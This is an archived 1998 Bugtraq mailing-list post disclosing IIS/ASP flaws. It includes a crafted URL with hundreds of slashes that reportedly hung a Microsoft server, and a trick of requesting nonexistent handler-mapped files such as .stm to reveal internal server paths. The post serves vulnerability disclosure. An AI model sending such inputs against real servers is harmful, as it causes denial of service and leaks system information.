[5980] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

IIS/ASP bugs

daemon@ATHENA.MIT.EDU (Dave Edis)
Thu Jan 15 21:28:28 1998

Date: 	Thu, 15 Jan 1998 14:24:04 -0800
Reply-To: Dave Edis <dave@EDIS.ORG>
From: Dave Edis <dave@EDIS.ORG>
To: BUGTRAQ@NETSPACE.ORG

I tryed the following and the server stopped resoponding
on ieak.microsoft.com:

http://ieak.microsoft.com/ASPSamp/Samples/code.asp?source=/ASPSamp///////Samples/hello.asp

* replace //////// with a few hundred forward slashes

Looks like any IIS server with ASPSamp directory installed is
vulnerable..
(or ASPs that take file paths as input)

And something else... I notice handler mapped file extensions
reveal system file paths for web directories..
ie: try (.idq, .idc, .stm, .pl, .cgi) depending on what is mapped.

example : http://www.microsoft.com/badidea.stm

Returns "Error processing SSI file 'd:\http\badidea.stm'"

____________________________________________________________________
Dave Edis                                       http://www.edis.org/


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[5980] in bugtraq

IIS/ASP bugs

daemon@ATHENA.MIT.EDU (Dave Edis)Thu Jan 15 21:28:28 1998

daemon@ATHENA.MIT.EDU (Dave Edis)
Thu Jan 15 21:28:28 1998